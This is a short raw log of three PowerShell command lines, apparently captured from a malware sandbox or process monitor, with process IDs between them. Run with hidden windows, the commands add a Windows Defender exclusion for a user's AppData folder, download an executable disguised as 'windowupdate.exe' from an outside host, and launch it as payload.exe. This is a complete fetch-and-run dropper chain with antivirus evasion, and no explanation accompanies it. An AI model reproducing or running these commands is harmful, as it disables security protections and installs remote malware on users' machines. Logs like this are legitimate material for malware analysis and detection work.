powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData'"
2860powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'http://tiendev.click/windowupdate.exe' -OutFile 'C:\Users\test22\AppData\Roaming\Custom-Application\files\payload.exe'"
3064powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\test22\AppData\Roaming\Custom-Application\files\payload.exe'"
2240